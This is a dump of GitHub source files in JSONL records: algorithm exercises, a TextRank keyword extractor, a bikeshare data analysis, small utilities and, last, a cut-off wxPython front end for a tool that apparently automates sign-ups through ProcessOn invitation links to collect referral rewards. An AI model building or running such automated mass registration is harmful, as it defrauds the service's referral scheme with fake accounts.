heapq.heapify(t)\r\n\r\n while queue or t:\r\n time += 1\r\n\r\n if not t: # if heap is empty, set time to what needs to be processed next\r\n time = queue[0][1]\r\n\r\n else:\r\n cnt = heapq.heappop(t) + 1\r\n\r\n if cnt: # if the number is not 0, we can process it\r\n queue.append([cnt, n + time])\r\n \r\n if queue and queue[0][1] == time:\r\n heapq.heappush(t, queue.popleft()[0])\r\n\r\n return time\r\n # Time O(N * M) # Space O(N)","repo_name":"garysmith1933/NeetCodeRoadMap","sub_path":"Heaps/task_scheduler.py","file_name":"task_scheduler.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39760487036","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 11 13:57:36 2020\n\n@author: Diana McSpadden\n\"\"\"\n# import needed libraries\nimport time as t\nimport numpy as np\n\n# define timer value\nt0 = 0\n\ndef clearTimer():\n global t0\n t0 = 0\n\n\ndef stopWatch(startOrStop):\n global t0\n \n if startOrStop == \"START\":\n # get the start time in seconds\n t0 = t.time()\n elif startOrStop == \"STOP\":\n # get the difference in time\n timerSeconds = t.time() - t0\n # clear the timer\n clearTimer()\n \n return timerSeconds\n\n# clear t0\nclearTimer()\n\n# Now that I have the functions let's time kronecker multiplication\nx = np.arange(4).reshape(2, 2)\ny = np.arange(5, 9).reshape(2, 2)\nprint(x)\nprint(y)\n\n# start the timer and run multiplication\nstopWatch(\"START\")\nresult = np.kron(x, y)\n# stop the timer\nkronSeconds = stopWatch(\"STOP\")\n\nprint(result)\nprint(\"Kron multiplication of x and y took \", kronSeconds, \" seconds.\")\n","repo_name":"hdmcspadden/UVaTechBootcamp","sub_path":"PythonExercises/PythonStopwatch.py","file_name":"PythonStopwatch.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71563784392","text":"#!/usr/bin/env python3\nfrom ..intcode import Program\nimport itertools\nfrom os import path\n\n\nif __name__ == \"__main__\":\n filename = path.abspath(path.join(path.dirname(__file__), \"input.txt\"))\n p = Program(filename)\n for noun, verb in itertools.product(range(100), range(100)):\n print(f\"Running program with inputs {noun} and {verb}...\")\n if p.run(noun, verb) == 19690720:\n print(\"Success!\")\n exit(0)\n print(\"No match found\")\n","repo_name":"danapplegate/AdventOfCode2019","sub_path":"src/aoc2019/2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22817723787","text":"# 032 Number guessing game\n# Difficulty 1: 1~10, 2: 1~100, 3: 1~1000\n# Ask for the difficulty level and start the game.\n# Pick a random number within the range and ask the player to guess it.\n# After every guess, print whether it was too high or too low.\n# When the player guesses correctly, print how many guesses it took\n# and ask whether to play again.\nimport random\n\nprint(\"Let's play Guess the Number.\")\ndifficulty = int(input(\"Enter the level of difficulty(1~3): \"))\n\nagain = \"y\"\nwhile again == \"y\":\n\tif 1 <= difficulty <= 3:\n\t\tlimit = pow(10, difficulty)\n\telse:\n\t\tprint(\"Wrong input\")\n\t\tbreak\n\n\trandomNumber = random.randint(1, limit)\n\tc = 0\n\tguess = -1\n\n\twhile guess != randomNumber:\n\t\tguess = int(input(\"I have my number. What's your guess? \"))\n\n\t\tif guess > randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Too high! guess again.\")\n\t\telif guess < randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Too low! 
guess again.\")\n\t\telif guess == randomNumber:\n\t\t\tc += 1\n\t\t\tprint(\"Correct! You got it in %d guesses.\" % c)\n\t\telse:\n\t\t\tprint(\"Wrong input\")\n\tagain = input(\"Play again?(y/n) \")\n","repo_name":"BackToTheSchool/assignment_hw","sub_path":"171108_Python/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17865396124","text":"import logging\nimport re\nfrom dataclasses import asdict, dataclass\nfrom typing import Dict, List, Set, Union\n\nimport spacy\nfrom spacy.tokens import Doc, Span\n\nfrom cloud_worker.textrank_module.clustering import cluster_sentences\n\nfrom .nlp import (\n _decode_unicode,\n _remove_non_ascii,\n _remove_non_core_words,\n _remove_stopwords,\n _simple_tokenize,\n)\nfrom .pagerank import PageRank, Undirected_Node\n\n\"\"\"\nTextRank.keyword_extraction__undirected() - return a list of keywords from a string\n\"\"\"\n\nlog = logging.getLogger(__name__)\n\n@dataclass\nclass Keyword_Extraction_Result:\n nodes: List[Undirected_Node]\n\n\nclass Singleton(type):\n _instances = {}\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n \n\nclass TextRank(metaclass=Singleton):\n def __init__(self) -> None:\n log.info('loading spacy model...')\n self.nlp = spacy.load('en_core_web_lg') # generate a spacy natural language processing object\n \n def sentence_extraction__undirected(self, text: Union[str, List[str]], converge_val:float=0.01):\n if isinstance(text, str):\n text = _decode_unicode(text)\n text = _remove_non_ascii(text)\n nodes = [i.as_doc() for i in self.nlp(text).sents]\n \n elif isinstance(text, List):\n text = [_decode_unicode(i) for i in text]\n text = [_remove_non_ascii(i) for i in text]\n nodes = [self.nlp(i) for i in text]\n \n else: raise ValueError( f'expected str, instead got {type(text)}')\n \n nodes = self._generate_nodes_from_similarity(nodes)\n \n result = PageRank.calculate__undirected_no_optimise(nodes, converge_val=converge_val)\n \n sorted_result = sorted(result.items(), key=lambda x:x[1], reverse=True)\n result_nodes: List[dict] = []\n \n for node,score in sorted_result:\n # convert node to dict for serialization\n node_dict = node.asdict()\n node_dict['score'] = score\n result_nodes.append(node_dict)\n \n return result_nodes\n \n \n def keyword_extraction__undirected(self, string:str,\n converge_val:float=0.01,\n number_to_keep: int=0,\n pos_tags:List[str] = ['NOUN','ADJ', \n 'PROPN'\n # 'VERB','ADV'\n ],\n damping_factor=0.1,\n cooccurence_value=2\n ):\n \n number_to_keep = number_to_keep or len(string) // 3 # as defined in the paper\n log.debug([(i.text, i.pos_) for i in self.nlp(string)])\n filtered_text = _decode_unicode(string)\n filtered_text = _remove_non_ascii(filtered_text)\n filtered_text = ' '.join([i.text for i in self.nlp(string) if i.pos_ in pos_tags])\n filtered_text = _remove_stopwords(filtered_text)\n filtered_text = _simple_tokenize(filtered_text)\n if not any(filtered_text): return []\n \n nodes = self._generate_nodes_from_cooccurence(filtered_text, cooccurence_value)\n result = PageRank.calculate__undirected_no_optimise(nodes, converge_val=converge_val, random_surf_prob=damping_factor)\n \n sorted_result = sorted(result.items(), key=lambda x:x[1], reverse=True)\n sorted_result = sorted_result[:number_to_keep]\n \n result_nodes: List[Dict[str,float]] = []\n \n for 
node,score in sorted_result:\n            # convert node to dict for serialization\n            node_dict = node.asdict()\n            node_dict['score'] = score\n            result_nodes.append(node_dict)\n        return result_nodes\n    \n    def _generate_nodes_from_similarity(self, sentences:List[Doc], threshold: float = 0.5):\n        node_dict:Dict[str, Undirected_Node] = {}\n        # helper function to get a Node from the dict or generate a new Node if one doesn't exist\n        def get_from_node_dict(token_orth:str) -> Undirected_Node:\n            if token_orth in node_dict: return node_dict[token_orth]\n            else:\n                node_dict[token_orth] = Undirected_Node(name=token_orth)\n                return node_dict[token_orth]\n        \n        \n        for idx, i in enumerate(sentences):\n            i_node = get_from_node_dict(i.text)\n            for jdx, j in enumerate(sentences[idx+1:]):\n                j_node = get_from_node_dict(j.text)\n                score = abs(i.similarity(j))\n                i_node.to(j_node, score)\n        return list(node_dict.values())\n    \n    def _generate_nodes_from_cooccurence(self, tokens: List[str],\n                                         cooccurence_value=2) -> List[Undirected_Node]:\n        \"\"\"given a string, use cooccurrence to create an undirected graph where nodes are connected if they are cooccurrent\"\"\"\n        node_dict = {}\n        \n        # helper function to get a Node from the dict or generate a new Node if one doesn't exist\n        def get_from_node_dict(token_orth:str):\n            if token_orth in node_dict: return node_dict[token_orth]\n            else:\n                node_dict[token_orth] = Undirected_Node(name=token_orth)\n                return node_dict[token_orth]\n        \n        \n        for index,token in enumerate(tokens):\n            node = get_from_node_dict(token)\n            previous, following = self._find_cooccurent(tokens, index, cooccurence_value=cooccurence_value)\n            # log.error(previous)\n            # log.error(following)\n            \n            nodes = [get_from_node_dict(token) for token in (*previous, *following)]\n            # log.error(nodes)\n            # log.error('\\n')\n            \n            for other_node in nodes:\n                node.to(other_node)\n        \n        return list(node_dict.values())\n    \n    def regenerate_keyphrases(self, keyword_dict:Dict[str, int], original_text:str):\n        \"\"\"combine keywords that are next to each other\"\"\"\n        keywords = set(i.lower() for i in keyword_dict)\n        log.debug(keyword_dict)\n        keyword_dict_copy = {k.lower():v for k,v in keyword_dict.items()}\n        \n        original_text = original_text.lower()\n        split_text = original_text.replace('\\n',', ').split(' ')\n        \n        results:Dict[str, int] = {}\n        keywords_used = set()\n        \n        # find keyphrases in the text by checking for contiguous keywords\n        index = 0\n        while index < len(split_text):\n            token = split_text[index]\n            \n            if token not in keywords: \n                # the current word is not part of a keyphrase\n                index+=1\n                continue \n            \n            keywords_used.add(token)\n            max_score = keyword_dict_copy[token]\n            keyphrase = [token]\n            increment = 1\n            \n            while True:\n                next_token = split_text[index+increment] if index+increment <= len(split_text)-1 else ''\n                cleaned_next_token = re.sub(r'[^a-zA-Z0-9]', '', next_token)\n                \n                if not cleaned_next_token or cleaned_next_token not in keywords: # terminating condition - add phrase to results\n                    log.debug(f'adding keyphrase {keyphrase} because not in keywords')\n                    results[' '.join(keyphrase)] = max_score\n                    break\n                \n                score = keyword_dict_copy.get(cleaned_next_token) or keyword_dict_copy.get(next_token) or -1\n                max_score = max(score, max_score)\n                \n                keywords_used.add(cleaned_next_token)\n                keyphrase.append(cleaned_next_token)\n                \n                if (any(i in next_token for i in [',', '.', '\\n'])): # if the word has either comma or fullstop, then end the keyphrase\n                    log.debug(f'adding keyphrase {keyphrase} because terminator')\n                    results[' '.join(keyphrase)] = max_score\n                    break\n                \n                increment += 1\n
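\n            # advance the scan past every token that was folded into this keyphrase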
\n            index+=increment\n        \n        results = {k:v for k,v in results.items() if len(k.split(' ')) > 1}\n        \n        return results\n    \n    \n    \n    \n    # if any(token in l for l in keywords) and index'\n\n    ask = str()\n    while ask.lower() not in valid_optns.keys():\n        ask = input(qstn_txt)\n        if ask.lower() not in valid_optns.keys():\n            print('\"' + ask + '\" is not a valid input.')\n        else:\n            print('Selected: ' + valid_optns.get(ask))\n    return valid_optns.get(ask)\n\ndef time_string(sec):\n    # Returns a detailed, human readable time string based on a numeric value representing number of seconds\n    # Args:\n    #     (sec) - a numeric value representing a number of seconds\n    factrs = {'years': 365*24*60*60, 'days': 24*60*60,'hrs': 60*60, 'mins': 60}\n    x = round(sec,0)\n    strt = False\n    out = {}\n    for i in factrs:\n        y, x = divmod(x, factrs.get(i))\n        if (y == 0 and strt == True) or y!=0:\n            out[i] = int(y)\n            strt = True\n    out['secs'] = int(x)\n    time_str = ', '.join('{} {}'.format(val, key) for key, val in out.items())\n    return time_str\n\ndef series_mode_summary(series, txt):\n    # Prints text summarising the mode of the values from a provided series accompanied with descriptive text\n    # Args:\n    #     (series) - A pandas series\n    #     (txt) - Descriptive text of the mode being printed\n    conv = lambda x: int(round(x,0)) if type(x) == float else x\n    modes = [str(conv(i)) for i in series.mode(dropna=True)]\n    mode_str = ' (AND) '.join(modes)\n    multi = '' if len(modes) == 1 else '*'+str(len(modes))\n    mode_vals = series.value_counts().sort_values(ascending=False)\n    print('{}{}, n={:,}{}'.format(txt, mode_str,mode_vals.iloc[0],multi))\n\ndef main_input():\n    # Asks the user for input regarding the data to select and filter, then returns the user selections\n    redo = 'Yes'\n    while redo == 'Yes':\n        # USER INPUT: Ask user to select city dataset to analyse\n        city = list_select('\\nWhich dataset would you like to select?',\n                           ['washington','chicago','new_york_city'])\n\n        # USER INPUT: Ask user if they want to filter data by month\n        if list_select('\\nWould you like to filter by month?', ['Yes','No']) == 'Yes':\n            month = list_select('\\nWhich month?',\n                                [cal.month_name[i] for i in np.arange(1,7)])\n        else:\n            month = False\n\n        # USER INPUT: Ask user if they want to filter data by type of day\n        if list_select('\\nWould you like to filter the data by type of day?', ['Yes','No'])=='Yes':\n            daytype = list_select('\\nWhich day type?', ['weekend','weekday'])\n        else:\n            daytype = False\n\n        # Check with user if they are happy with their selection\n        print(\n            '\\nYou selected:\\n    Dataset: ' + city +\n            '\\n    Month filter: ' + str(month) +\n            '\\n    Day type filter: ' + str(daytype)\n            )\n        redo = list_select(\"Would you like to re-do your selection?\", ['Yes','No'])\n\n    return city, month, daytype\n\n\ndef main_datamanip(city, month, daytype):\n    # Reads a csv into a dataframe then manipulates the dataframe\n    # Args:\n    #     (city) - the name of the csv file to read into the DATAFRAME\n    #     (month) - a string representing the month value to filter by,\n    #               has a value of False if no filtering is to be done.\n    #     (daytype) - a string representing the daytype to filter by,\n    #                 has a value of False if no filtering is to be done.\n    # Returns:\n    #     The dataframe created by the function.\n\n    # Read csv into dataframe\n    print(\"\\nReading csv into dataframe...\")\n    global df\n    df = pd.read_csv('{}.csv'.format(city))\n\n    # REDUNDANT\n    print(\"Creating new column 'ROUTE'...\")\n    x = df[['Start Station','End Station']].to_numpy()\n    x.sort(axis=1)\n    df['ROUTE'] = [\"<==>\".join(i) for i in 
x.tolist()]\n\n    # REDUNDANT\n    print(\"Creating new column 'DIRECTION'...\")\n    dir_cats = {\n        'LOOP': (df['Start Station'] == df['End Station']),\n        'TO<==>FROM': (df['Start Station'] > df['End Station']),\n        'FROM<==>TO': (df['Start Station'] < df['End Station'])\n    }\n    df['DIRECTION'] = np.select(dir_cats.values(), dir_cats.keys())\n\n    # Create Start Month Column. Filter if necessary\n    print(\"Creating new column 'Start Month'...\")\n    df['Start Month'] = pd.to_datetime(df['Start Time']).dt.month_name()\n    df['Start Month'] = pd.Categorical(df['Start Month'],\n                                       categories = list(cal.month_name[1:]),\n                                       ordered = True)\n    if month:\n        print(\"Filtering by 'Start Month' == '\" + month + \"'...\")\n        df = df[(df['Start Month']==month)]\n\n    # Create Start Day columns\n    print(\"Creating new column 'Start Day Number'...\")\n    df['Start Day Number'] = pd.to_datetime(df['Start Time']).dt.dayofweek\n    print(\"Creating new column 'Start Day'...\")\n    df['Start Day'] = pd.to_datetime(df['Start Time']).dt.day_name()\n    df['Start Day'] = pd.Categorical(df['Start Day'],\n                                     categories = list(cal.day_name),\n                                     ordered = True)\n\n    # Create Start Hour columns\n    print(\"Creating new column 'Start Hour'...\")\n    df['Start Hour'] = pd.to_datetime(df['Start Time']).dt.strftime('%H')\n    df['Start Hour (12H)'] = pd.to_datetime(df['Start Time']).dt.strftime('%I%p')\n\n    # Fillna the 'Gender' column if present\n    if 'Gender' in df.columns:\n        df['Gender'].fillna('Unknown', inplace=True)\n\n    print(\"Creating new column 'Trip Dur(mins)'...\")\n    df['Trip Dur(mins)'] = df['Trip Duration']/60\n\n    # Create 'Start Day Type' column, filter if necessary\n    print(\"Creating new column 'Start Day Type'...\")\n    day_cats = {\n        'weekend': (df['Start Day Number'] > 4),\n        'weekday': (df['Start Day Number'] <= 4)\n    }\n    df['Start Day Type'] = np.select(day_cats.values(), day_cats.keys())\n    if daytype:\n        print(\"Filtering by 'Start Day Type' == '\" + daytype + \"'...\")\n        df = df[(df['Start Day Type']==daytype)]\n\n    # Create generation column\n    if 'Birth Year' in df.columns:\n        print(\"Creating new column 'Generation'...\")\n        gnrtn_cats = {\n            \"Unknown\": (np.isnan(df['Birth Year'])),\n            \"Pre-boomer(-'45)\": (df['Birth Year'] < 1946),\n            \"Boomer('46-'64)\": (df['Birth Year'].between(1946, 1965, 'left')),\n            \"Gen-X('65-'80)\": (df['Birth Year'].between(1965, 1981, 'left')),\n            \"Gen-Y('80-'96)\": (df['Birth Year'].between(1981, 1997, 'left')),\n            \"Gen-Z('97-)\": (df['Birth Year'] >= 1997)\n        }\n        df['Generation'] = np.select(gnrtn_cats.values(), gnrtn_cats.keys())\n        df['Generation'] = pd.Categorical(df['Generation'],\n                                          categories = gnrtn_cats.keys(),\n                                          ordered = True)\n\n    # Create 'Duration Category' column\n    print(\"Creating new column 'Duration Category'...\")\n    dur_cats = {\n        '00<=mins<05': (df['Trip Dur(mins)'] < 5),\n        '05<=mins<10': (df['Trip Dur(mins)'].between(5, 10, 'left')),\n        '10<=mins<30': (df['Trip Dur(mins)'].between(10, 30, 'left')),\n        'mins>=30': (df['Trip Dur(mins)'] >= 30)\n    }\n    df['Duration Category'] = np.select(dur_cats.values(), dur_cats.keys())\n\n    return df\n\n\ndef main_stats(df, month, daytype):\n    # Calculates and prints descriptive statistics from the dataframe provided\n    # Args:\n    #     (df) - the dataframe to be analysed\n    #     (month) - a string indicating whether monthly stats can be calculated\n    #     (daytype) - a string indicating whether daytype stats can be calculated\n    # Returns:\n    #     Nothing\n\n    # 1 Popular times of Travel\n    print('\\nTOPIC 1: POPULAR TIMES OF TRAVEL\\n')\n\n    # -most common month\n    if month == False:\n        series_mode_summary(df['Start Month'],'Most popular month:\\n    ')\n\n    # -most common day of week\n
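    # series_mode_summary prints e.g. \"Most popular weekday:\\n    Tuesday, n=1,234\" (illustrative values)\n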
    day_counts = df['Start Day'].value_counts().sort_values(ascending = False)\n    if daytype == False:\n        txt = ''\n    elif daytype == 'weekend':\n        txt = 'weekend '\n    elif daytype == 'weekday':\n        txt = 'week'\n    series_mode_summary(df['Start Day'],\n                        'Most popular {}day:\\n    '.format(txt))\n\n    # -most common hour of day\n    series_mode_summary(df['Start Hour (12H)'],\n                        'Most popular starting hour:\\n    ')\n\n    # 2 Popular stations and trip\n    print('\\nTOPIC 2: POPULAR STATIONS AND ROUTES\\n')\n    # -most common start station\n    series_mode_summary(df['Start Station'],\n                        'Most popular starting station:\\n    ')\n    # -most common end station\n    series_mode_summary(df['End Station'],\n                        'Most popular ending station:\\n    ')\n    # -most common trip from start to end\n    route_counts = df[['Start Station','End Station']].value_counts()\n    max_count = route_counts.max()\n    modes = route_counts[route_counts == max_count]\n    print('Most popular route:')\n    routes = list()\n    for i, j in modes.index:\n        routes.append('    {} {}, n={:,}'.format(i,j,max_count))\n    print('\\n    &\\n'.join(routes))\n\n    # 3 Trip Duration\n    print('\\nTOPIC 3: TRIP DURATIONS\\n')\n    # -total travel time\n    tot_time = time_string(df['Trip Duration'].sum())\n    print('Total user time spent in transit:\\n    ' + tot_time)\n    # -average travel time\n    ave_time = time_string(df['Trip Duration'].mean())\n    print('Average trip duration:\\n    ' + ave_time)\n\n    # 4 User info\n    print('\\nTOPIC 4: USER INFO')\n    # -counts of each user type\n    print('\\nTrip counts by user type:')\n    n_utype = df['User Type'].value_counts().sort_values(ascending = False)\n    for i in n_utype.index:\n        print('    {}: {:,}'.format(i.upper(), n_utype.loc[i]))\n\n\n    # user stats for Chicago and New York datasets\n    if city in ['chicago', 'new_york_city']:\n        # -count of each gender (dataset specific)\n        print('\\nTrip counts by user gender:')\n        n_gender = df['Gender'].value_counts()\n        for i in n_gender.index:\n            print('    {}: {:,}'.format(i.upper(), n_gender.loc[i]))\n\n        # -earliest, most recent, most common year of birth\n        print('\\nYear of birth stats:')\n        print('    EARLIEST: {:.0f}'.format(df['Birth Year'].dropna().min()))\n        print('    LATEST: {:.0f}'.format(df['Birth Year'].dropna().max()))\n        series_mode_summary(df['Birth Year'], '    MOST COMMON: ')\n\ndef bar_chart(df):\n    # Displays stacked bar charts based on requested user input\n    # Args:\n    #     (df) - the dataframe used to prepare the bar charts from\n    # Returns:\n    #     Nothing\n\n    # Set list of columns user can select for visualisation\n    category_list = ['Gender', 'User Type', 'Generation', 'Duration Category',\n                     'Start Hour','Start Month','Start Day Type', 'Start Day']\n    category_list = [i for i in category_list if i in df.columns]\n\n    # Select x-axis category\n    xaxis = list_select('\\nSelect a category to represent along the x-axis.',\n                        category_list)\n    category_list.remove(xaxis)\n\n    # Select bar grouping category\n    groups = list_select('\\nSelect a category to group the bars by.',\n                         category_list)\n\n    # Prepare dataframe for chart\n    df2 = df.groupby([groups, xaxis])\n    df2 = df2.agg(transit_time=('Trip Duration',np.sum),\n                  trips=('Trip Duration', 'size'))\n    df2 = df2.reset_index()\n    df3 = df2.pivot(index=xaxis, columns=groups, values='trips')\n    df3.sort_index(axis=1, inplace=True)\n\n    # create and format plot\n    plt.ion()\n    ax = df3.plot.bar(stacked=True, backend='matplotlib')\n    plt.xticks(rotation=45)\n    ax.set_yticks(ax.get_yticks())\n    ax.set_yticklabels(['{:,}'.format(int(x)) for x in ax.get_yticks().tolist()])\n    plt.title('Number of Trips by {}, grouped by {}'.format(xaxis, groups))\n
    plt.ylabel('Number of Trips')\n    plt.tight_layout()\n\n\n# EXECUTE MAIN FUNCTIONS\n\n# Ask for input and prepare data\ncity, month, daytype = main_input()\ndf = main_datamanip(city, month, daytype)\n\n# Print raw data\nif list_select('\\nWould you like to see 5 lines of the dataset you selected?', ['Yes','No']) == 'Yes':\n    again = 'Yes'\n    x = 0\n    while again == 'Yes':\n        print(tabulate(df.iloc[x:x+5], headers = 'keys'))\n        again = list_select('\\nPrint another 5 lines?', ['Yes','No'])\n        x += 5\n\n# Print descriptive statistics\nmain_stats(df, month, daytype)\n\n# Display any visualisations\nif list_select('\\nWould you like to create a bar chart of the trip data?', ['Yes','No']) == 'Yes':\n    again = None\n    while again != 'No':\n        bar_chart(df)\n        again = list_select('\\nWould you like to create another bar chart?', ['Yes','No'])\n","repo_name":"MisterRousseau/GIT-PROJ-3","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":13829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"12188161966","text":"# encoding: utf-8\n\nimport os\nimport csv\nimport json\nimport geojson\nfrom shapely.geometry import shape\n\ndef write_errors_to_file(env_name, coverage, test_category, detail_test_result):\n    \"\"\" creates the output csv file containing the errors from the executed tests \"\"\"\n    file_name = \"{}_{}_{}.csv\".format(env_name, coverage, test_category )\n    out_file = os.path.realpath(\"../frontend/results/\" + file_name)\n    with open(out_file, \"w\") as csv_file:\n        writer = csv.writer(csv_file, delimiter=';', quoting=csv.QUOTE_MINIMAL)\n        for line in detail_test_result:\n            writer.writerow(line)\n\ndef generate_file_summary():\n    \"\"\" creates the output files.json file listing the files to display on the frontend \"\"\"\n    file_dir = os.path.realpath(\"../frontend/results/\")\n    file_list = {\"files\":[]}\n    for f in os.listdir(file_dir):\n        full_f = os.path.join(file_dir, f)\n        if os.path.isfile(full_f) and (f[-3:]==\"csv\"):\n            file_list[\"files\"].append(f)\n    with open(os.path.join(file_dir, \"files.json\"), mode=\"w\", encoding=\"utf8\") as f:\n        json.dump(file_list, f, indent=4, separators=(',', ': '))\n        f.close()\n\ndef geojson_to_wkt(geojson_data):\n    if geojson_data['coordinates'] == []:\n        return \"\"\n    g = geojson.loads(json.dumps(geojson_data))\n    wkt = shape(g).wkt\n    return wkt.replace(\", \", \",\")\n\nif __name__ == \"__main__\":\n    generate_file_summary()\n","repo_name":"kinnou02/vipere","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"37126971732","text":"import re\n\ndef checkio(words_set):\n\n    words = list(words_set)\n    words.sort(key=len)\n\n    #print(words)\n\n    for suffix_idx in range( len(words)-1):\n        suffix = words[suffix_idx]\n\n        #print(suffix_idx)\n        for word_idx in range(suffix_idx+1, len(words)):\n            word = words[word_idx]\n            #print('word_idx:',word_idx)\n            if suffix != word:\n                #print('suffix:',suffix,' word:', word)\n                if word.endswith(suffix):\n                    return True\n\n    return False\n\n\n#These \"asserts\" are used only for self-checking and are not necessary for auto-testing\nif __name__ == '__main__':\n    print(checkio({\"hello\", \"lo\", \"he\"}))\n\n    print(checkio({\"helicopter\", \"li\", \"he\"}))\n\n\n\n    assert checkio({\"hello\", \"lo\", \"he\"}) == True, \"helLO\"\n    assert checkio({\"hello\", \"la\", \"hellow\", \"cow\"}) == False, \"hellow la cow\"\n    assert 
checkio({\"walk\", \"duckwalk\"}) == True, \"duck to walk\"\n assert checkio({\"one\"}) == False, \"Only One\"\n assert checkio({\"helicopter\", \"li\", \"he\"}) == False, \"Only end\"\n","repo_name":"sandeepmanocha/myCheckIO","sub_path":"suffix.py","file_name":"suffix.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9092189775","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport threading\n\nimport wx\nimport wx.adv\nfrom pubsub import pub\n\nfrom handler import main_process\nfrom logger import LOG\nfrom tools import *\n\n# 根据当前文件获取当前路径\n# CURRENT_PATH = os.path.abspath(os.path.dirname(__file__))\n\n\nclass WorkerThread(threading.Thread):\n def __init__(self, url: str, numbers: int, visual: bool, logger=None):\n super().__init__()\n self.url = url\n self.numbers = numbers\n self.visual = visual\n self.logger = logger\n self.start()\n\n def run(self):\n pub.sendMessage('update', msg='start')\n main_process(url=self.url, numbers=self.numbers, visual=self.visual, logger=self.logger)\n pub.sendMessage('update', msg='finish')\n\n def stop(self):\n try:\n async_raise(self.ident, SystemExit)\n except (ValueError, SystemError):\n self.logger.exception(\"停止线程时遇到异常: \")\n pass\n\n\nclass ProcessOnFrame(wx.Frame):\n def __init__(self, *args, **kw):\n super(ProcessOnFrame, self).__init__(*args, **kw)\n # 绑定关闭事件\n self.Bind(wx.EVT_CLOSE, self.onClose)\n self.icon = get_resource_file(relative_path='favicon.ico', reference=__file__)\n self.logger = None\n self.worker = None\n self.tc_link, self.ch_number, self.tc_log, self.ck_visualization, self.btn_signup = None, None, None, None, None\n self.initUI()\n self.Center()\n self.Show()\n\n def onClose(self, event):\n if self.worker and self.worker.is_alive():\n ret = wx.MessageBox(u'程序正在运行中,是否关闭程序?', u'确认退出', wx.OK | wx.CANCEL)\n if ret == wx.OK:\n if self.worker.is_alive():\n self.worker.stop()\n event.Skip()\n else:\n ret = wx.MessageBox(u'是否关闭程序?', u'确认退出', wx.OK | wx.CANCEL)\n if ret == wx.OK:\n event.Skip()\n\n def initUI(self):\n # 设置窗口图标\n self.SetIcon(wx.Icon(self.icon, wx.BITMAP_TYPE_ICO))\n\n self.initMenu()\n\n panel = wx.Panel(self)\n\n # 邀请链接/邀请用户数标签\n st_link = wx.StaticText(panel, label=u'邀请链接: ', style=wx.TE_LEFT)\n st_desc_link = wx.StaticText(panel, label=u'注:在账户中心最下方可以找到邀请链接,'\n u'如:https://www.processon.com/i/5cc564f5e4b09eb4ac2b498e',\n style=wx.TE_LEFT | wx.ST_ELLIPSIZE_END)\n st_number = wx.StaticText(panel, label=u'邀请用户数: ', style=wx.TE_LEFT)\n st_desc_number = wx.StaticText(panel, label=u'注:每个用户通过邀请链接注册成功后,你会获得3张文件数量的奖励')\n # 邀请链接输入框\n self.tc_link = wx.TextCtrl(panel, style=wx.TE_LEFT)\n # 邀请用户数选择器\n choices = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']\n self.ch_number = wx.Choice(panel, choices=choices)\n self.ch_number.SetSelection(0)\n # self.Bind(wx.EVT_CHOICE, self.onChoice, self.ch_number)\n # 日志\n self.tc_log = wx.TextCtrl(panel, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)\n # 可视化勾选框\n self.ck_visualization = wx.CheckBox(panel, label=u'可视化', style=wx.CHK_2STATE)\n # 邀请注册按钮\n self.btn_signup = wx.Button(panel, label=u'邀请注册')\n self.Bind(wx.EVT_BUTTON, self.onSignUpClick, self.btn_signup)\n\n # 邀请链接组件布局\n bs_link = wx.BoxSizer(wx.HORIZONTAL)\n bs_link.Add(st_link, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT, border=5)\n bs_link.Add(self.tc_link, proportion=2, flag=wx.ALL | wx.EXPAND, border=5)\n\n bs_desc_link = wx.BoxSizer(wx.HORIZONTAL)\n bs_desc_link.Add(st_desc_link, 
proportion=0, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_LEFT, border=5)\n\n        # Layout for the invited-user count widgets\n        bs_number = wx.BoxSizer(wx.HORIZONTAL)\n        bs_number.Add(st_number, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT, border=5)\n        bs_number.Add(self.ch_number, proportion=0, flag=wx.ALL, border=5)\n        bs_number.Add(st_desc_number, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL, border=5)\n\n        # Layout for the log widget\n        bs_log = wx.BoxSizer(wx.HORIZONTAL)\n        bs_log.Add(self.tc_log, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)\n\n        # Layout for the invite sign-up button\n        bs_signup = wx.BoxSizer(wx.HORIZONTAL)\n        bs_signup.AddStretchSpacer(1)\n        bs_signup.Add(self.ck_visualization, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL, border=5)\n        bs_signup.Add(self.btn_signup, proportion=0, flag=wx.ALL, border=5)\n\n        bs_all = wx.BoxSizer(wx.VERTICAL)\n        bs_all.Add(bs_link, proportion=0, flag=wx.TOP | wx.LEFT | wx.RIGHT | wx.EXPAND, border=5)\n        bs_all.Add(bs_desc_link, proportion=0, flag=wx.LEFT | wx.RIGHT | wx.BOTTOM | wx.EXPAND, border=5)\n        bs_all.Add(bs_number, proportion=0, flag=wx.ALL | wx.EXPAND, border=5)\n        